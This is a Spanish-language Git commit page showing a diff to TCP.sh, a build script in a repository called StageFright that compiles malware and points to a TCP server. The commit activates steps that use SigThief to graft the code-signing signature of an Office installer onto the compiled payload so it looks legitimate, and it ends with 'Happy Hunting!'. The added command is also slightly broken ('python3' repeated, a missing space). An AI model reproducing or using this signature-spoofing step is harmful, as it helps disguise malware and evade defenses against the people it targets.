Explorar el Código

Update TCP.sh

assume-breach hace 2 años
padre
commit
85c8b1827a
Se han modificado 1 ficheros con 7 adiciones y 7 borrados
  1. 7 7
      StageFright/StageFright/StageFright/TCP/TCP.sh

+ 7 - 7
StageFright/StageFright/StageFright/TCP/TCP.sh

@@ -177,13 +177,13 @@ rm shell*
 echo -e ${yellow}"***Malware Compiled***"${clear}
 echo ""
 sleep 2
+echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
+echo ""
+sleep 2
+python3 python3 StageFright/Resources/SigThief/sigthief.py -i StageFright/Resources/OfficeSetup.exe-t $MALWARE -o signed$MALWARE >/dev/null 2>&1
+mv signed$MALWARE $MALWARE
+echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
+echo ""
 echo -e ${yellow}"***Edit And Run The TCP Server***"${clear}
-#echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
-#echo ""
-#sleep 2
-#python3 StageFright/StageFright/ResourcesSigThief/sigthief.py -i StageFright/StageFright/TCP/Resources/OfficeSetup.exe #-t $MALWARE -o signed$MALWARE >/dev/null 2>&1
-#mv signed$MALWARE $MALWARE
-#echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
-#echo ""